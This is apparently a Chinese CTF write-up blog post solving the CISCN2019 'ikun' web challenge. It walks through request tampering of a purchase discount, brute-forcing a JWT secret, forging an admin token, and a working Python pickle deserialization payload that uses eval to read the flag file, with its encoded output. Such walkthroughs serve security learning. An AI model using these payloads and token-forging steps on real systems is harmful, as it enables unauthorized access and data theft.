           href="/2025/01/26/buuctf%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98upload/"
           data-tag="文件上传,做题笔记"
           data-author="" >
            <span class="post-title" title="buuctf极客大挑战upload">buuctf极客大挑战upload</span>
            <span class="post-date" title="2025-01-26 16:36:39">2025/01/26</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/22/upload/"
           data-tag="文件上传,学习笔记"
           data-author="" >
            <span class="post-title" title="upload">upload</span>
            <span class="post-date" title="2025-01-22 15:22:47">2025/01/22</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/19/python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,python"
           data-author="" >
            <span class="post-title" title="python学习笔记">python学习笔记</span>
            <span class="post-date" title="2025-01-19 01:39:35">2025/01/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Http/"
           data-tag="刷题笔记,http协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Http">极客大挑战2019Http</span>
            <span class="post-date" title="2025-01-09 16:47:44">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019SecretFile/"
           data-tag="刷题笔记,filter伪协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019SecretFile">极客大挑战2019SecretFile</span>
            <span class="post-date" title="2025-01-09 01:36:08">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019LoveSQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019LoveSQL">极客大挑战2019LoveSQL</span>
            <span class="post-date" title="2025-01-05 20:00:42">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Havefun/"
           data-tag="刷题笔记,payload构造"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Havefun">极客大挑战2019Havefun</span>
            <span class="post-date" title="2025-01-05 19:35:48">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019EasySQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019EasySQL">极客大挑战2019EasySQL</span>
            <span class="post-date" title="2025-01-05 19:10:32">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/03/sql%E6%B3%A8%E5%85%A5/"
           data-tag="学习笔记,sql注入"
           data-author="" >
            <span class="post-title" title="sql注入">sql注入</span>
            <span class="post-date" title="2025-01-03 21:14:16">2025/01/03</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/29/MySQL/"
           data-tag="学习笔记,MySQL"
           data-author="" >
            <span class="post-title" title="MySQL">MySQL</span>
            <span class="post-date" title="2024-12-29 19:30:51">2024/12/29</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/28/php%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,正则表达式"
           data-author="" >
            <span class="post-title" title="正则表达式笔记">正则表达式笔记</span>
            <span class="post-date" title="2024-12-28 20:46:55">2024/12/28</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/26/PHP%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,php"
           data-author="" >
            <span class="post-title" title="PHP学习笔记">PHP学习笔记</span>
            <span class="post-date" title="2024-12-26 23:50:15">2024/12/26</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/HTML%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,HTML"
           data-author="" >
            <span class="post-title" title="HTML学习笔记">HTML学习笔记</span>
            <span class="post-date" title="2024-12-25 23:54:00">2024/12/25</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/welcome/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="welcome">welcome</span>
            <span class="post-date" title="2024-12-25 20:38:33">2024/12/25</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-CISCN2019华北赛区DayWeb2-ikun" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">CISCN2019华北赛区DayWeb2-ikun</h1>
    
    <div class="article-meta">
        
        
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">刷题笔记</a>
            
            <a class="color1">python反序列化</a>
            
            <a class="color3">jwt密钥爆破</a>
            
            <a class="color2">pickle</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2025-04-02 17:42:15'>2025-04-02 17:20</time>
        
    </div>
    <div class="article-meta">
        
        <span>Count:968</span>
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="Jump to comment area">
            <a href="#comments">
                Comment:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CISCN2019%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BADayWeb2-ikun"><span class="toc-text">CISCN2019华北赛区DayWeb2-ikun</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="CISCN2019华北赛区DayWeb2-ikun"><a href="#CISCN2019华北赛区DayWeb2-ikun" class="headerlink" title="CISCN2019华北赛区DayWeb2-ikun"></a>CISCN2019华北赛区DayWeb2-ikun</h1><p>首先提示我们要找到lv6</p>
<p><img src="/../image/CISCN2019%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BADayWeb2-ikun-1.png"></p>
<p>一页一页翻肯定是不可能的，可以写一个脚本，因为LV等级都是有参数的在网页源码里</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs routeros">import requests<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(1,1000):<br>    <span class="hljs-attribute">payload</span>=<span class="hljs-string">&quot;http://node4.anna.nssctf.cn:28150/shop?page=%d&quot;</span>%(i)<br>    <span class="hljs-attribute">res</span>=requests.get(payload)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;lv6.png&quot;</span> <span class="hljs-keyword">in</span> res.content.decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>):<br>     <span class="hljs-built_in">print</span>(i)<br>     break<br></code></pre></td></tr></table></figure>

<hr>
<p>发现在181页</p>
<p>然后购买（需要先注册账户），然后发现买不起只有1000。</p>
<p>这里抓个包看看，把折扣改以下改成0.0000001</p>
<p>这里应该是成功了，但是显示只有admin才能访问</p>
<p><img src="/../image/CISCN2019%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BADayWeb2-ikun-2.png"></p>
<p>在抓包的地方发现jwt，这里很容易就能想到是jwt加解密</p>
<p>在线网站解码<a target="_blank" rel="noopener" href="https://jwt.io/">jwt加解密网站</a></p>
<p><img src="/../image/CISCN2019%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BADayWeb2-ikun-3.png"></p>
<p>改成admin尝试登录，发现还是不行，500，服务错误，应该是jwt的密钥不对，导致正常的回显页面没出来</p>
<p>用解密工具：c-jwt-cracker试着爆破一下</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs llvm"><span class="hljs-keyword">c</span>-jwt-cracker - ( https://github.com/brendan-rius/<span class="hljs-keyword">c</span>-jwt-cracker)<br>C-jwt-cracker 是暴力破解 JWT 的私钥的工具。此外，它使用了 JWT 的实现，<span class="hljs-keyword">c</span>-jwt-cracker 使用的 Base<span class="hljs-number">64</span>库被证明是错误的，并且提供了无效的结果。<br></code></pre></td></tr></table></figure>

<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gcode">./jwtcrack eyJhbGciOiJIUzI<span class="hljs-number">1</span><span class="hljs-symbol">NiIsInR5</span>cCI<span class="hljs-number">6</span>IkpX<span class="hljs-attr">VCJ9</span>.eyJ<span class="hljs-number">1</span>c<span class="hljs-number">2</span>VybmFtZSI<span class="hljs-number">6</span>I<span class="hljs-symbol">nR0</span>I<span class="hljs-symbol">n0</span>.aT<span class="hljs-number">0</span>YBJFCjWrVH<span class="hljs-number">5</span>uwibrji_<span class="hljs-number">0</span><span class="hljs-symbol">NLf_1</span>SHX<span class="hljs-number">3</span>sf<span class="hljs-symbol">nBz14</span>jmKE<br></code></pre></td></tr></table></figure>

<p>爆破出来密钥是1Kun</p>
<p>在加解密工具里把密钥输进去，然后再修改用户admin</p>
<p>再抓包修改jwt，发现成功访问，然后点点击成为大会员发现没反应，&#x2F;b1g_m4mber页面发现了源码压缩包</p>
<p>接下来python代码审计</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> tornado.web<br><span class="hljs-keyword">from</span> sshop.base <span class="hljs-keyword">import</span> BaseHandler<br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> urllib<br><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">AdminHandler</span>(<span class="hljs-title class_ inherited__">BaseHandler</span>):<br><span class="hljs-meta">    @tornado.web.authenticated</span><br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">get</span>(<span class="hljs-params">self, *args, **kwargs</span>):<br>        <span class="hljs-keyword">if</span> <span class="hljs-variable language_">self</span>.current_user == <span class="hljs-string">&quot;admin&quot;</span>:<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable language_">self</span>.render(<span class="hljs-string">&#x27;form.html&#x27;</span>, res=<span class="hljs-string">&#x27;This is Black Technology!&#x27;</span>, member=<span class="hljs-number">0</span>)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable language_">self</span>.render(<span class="hljs-string">&#x27;no_ass.html&#x27;</span>)<br><br><span class="hljs-meta">    @tornado.web.authenticated</span><br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">post</span>(<span class="hljs-params">self, *args, **kwargs</span>):<br>        <span class="hljs-keyword">try</span>:<br>            become = <span class="hljs-variable language_">self</span>.get_argument(<span class="hljs-string">&#x27;become&#x27;</span>)<br>            p = pickle.loads(urllib.unquote(become))<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable language_">self</span>.render(<span class="hljs-string">&#x27;form.html&#x27;</span>, res=p, member=<span class="hljs-number">1</span>)<br>        <span class="hljs-keyword">except</span>:<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable language_">self</span>.render(<span class="hljs-string">&#x27;form.html&#x27;</span>, res=<span class="hljs-string">&#x27;This is Black Technology!&#x27;</span>, member=<span class="hljs-number">0</span>)<br>关键句是 p = pickle.loads(urllib.unquote(become)<br></code></pre></td></tr></table></figure>

<p>这里用的是 pickle.loads函数</p>
<p> 又看到是python2解释器</p>
<p>python2和python3的print是不一样的，python2中print是语句，但是在python3中print是函数</p>
<p>python2中的print “” 输出加不加括号都可以</p>
<p>而 python3中的print(）必须要加括号</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver"><span class="hljs-number">1</span>）pickle.dump(obj, <span class="hljs-built_in">file</span>, [,protocol])<br>    函数的功能：将obj对象序列化存入已经打开的<span class="hljs-built_in">file</span>中。<br>   参数讲解：<br>obj：想要序列化的obj对象。<span class="hljs-built_in">file</span>:文件名称。<br>protocol：序列化使用的协议。如果该项省略，则默认为<span class="hljs-number">0</span>。如果为负值或HIGHEST_PROTOCOL，则使用最高的协议版本。<br>（<span class="hljs-number">2</span>）pickle.<span class="hljs-built_in">load</span>(<span class="hljs-built_in">file</span>)<br>    函数的功能：将<span class="hljs-built_in">file</span>中的对象序列化读出。    参数讲解：<br><span class="hljs-built_in">file</span>：文件名称。<br>（<span class="hljs-number">3</span>）pickle.dumps(obj[, protocol])<br>   函数的功能：将obj对象序列化为<span class="hljs-keyword">string</span>形式，而不是存入文件中。<br>   参数讲解：<br>obj：想要序列化的obj对象。<br>protocal：如果该项省略，则默认为<span class="hljs-number">0</span>。如果为负值或HIGHEST_PROTOCOL，则使用最高的协议版本。<br>（<span class="hljs-number">4</span>）pickle.loads(<span class="hljs-keyword">string</span>)<br>   函数的功能：从<span class="hljs-keyword">string</span>中读出序列化前的obj对象。<br>   参数讲解：<br><span class="hljs-keyword">string</span>：文件名称。<br></code></pre></td></tr></table></figure>

<p>那我们的目的明显是读取flag文件，然后利用res输出内容。</p>
<p>dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力：dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中，随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件，并将该类序列化之后进行URL编码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: utf-8 -*-</span><br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> urllib<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">payload</span>(<span class="hljs-title class_ inherited__">object</span>):<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>       <span class="hljs-keyword">return</span> (<span class="hljs-built_in">eval</span>, (<span class="hljs-string">&quot;open(&#x27;/flag.txt&#x27;,&#x27;r&#x27;).read()&quot;</span>,))<br><br>a = pickle.dumps(payload())<br>a = urllib.quote(a)<br><span class="hljs-built_in">print</span>(a)<br><br><br>在kali中执行该脚本<br>python2 <span class="hljs-number">1.</span>py<br></code></pre></td></tr></table></figure>

<p>输出</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">c__builtin__</span>%<span class="hljs-number">0</span>Aeval%<span class="hljs-number">0</span>Ap0%<span class="hljs-number">0</span>A%<span class="hljs-number">28</span>S%<span class="hljs-number">22</span>open%<span class="hljs-number">28</span>%<span class="hljs-number">27</span>/flag.txt%<span class="hljs-number">27</span>%<span class="hljs-number">2</span>C%<span class="hljs-number">27</span>r%<span class="hljs-number">27</span>%<span class="hljs-number">29</span>.read%<span class="hljs-number">28</span>%<span class="hljs-number">29</span>%<span class="hljs-number">22</span>%<span class="hljs-number">0</span>Ap1%<span class="hljs-number">0</span>Atp2%<span class="hljs-number">0</span>ARp3%<span class="hljs-number">0</span>A. <br></code></pre></td></tr></table></figure>

<p>抓包添加到隐藏的post传参become后。</p>
<p>拿到flag</p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。 </span>
    </div>
</article>





    <div id="comments">
    <script>
        {
            const comments = document.getElementById("comments");
            const script = document.createElement("script");
            script.src = "https://giscus.app/client.js";
            script.setAttribute('data-repo', "MIXBP/MIXBP.github.io");
            script.setAttribute('data-repo-id', "R_kgDONYaZsg");
            script.setAttribute('data-category', "Announcements");
            script.setAttribute('data-category-id', "DIC_kwDONYaZss4ClAnT");
            script.setAttribute('data-mapping', "pathname");
            script.setAttribute('data-strict', "0");
            script.setAttribute('data-reactions-enabled', "1");
            script.setAttribute('data-emit-metadata', "0");
            script.setAttribute('data-input-position', "top");
            script.setAttribute('data-theme', "noborder_dark");
            script.setAttribute('data-lang', "zh-CN");
            script.setAttribute('data-loading', "lazy");
            script.setAttribute('crossorigin', "anonymous");
            script.setAttribute('async', "");
            comments.appendChild(script);
        }
    </script>
</div>



    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©MIXBP 2024
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    #post {
        background: url(/img/background.jpg);
    }
    
    
    #post .index {
        background: url(/img/background2.jpg);
    }
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("/img/bjtp.jpg");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>






<div class="mobile-menus-out" >

</div>
<div class="mobile-menus">
    
    
    
    <a class="dynamic-menu " target="_self"   href="https://mixbp.github.io/">MIXBP</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="https://mixbp.github.io/">github</a>
    
</div>


</html>
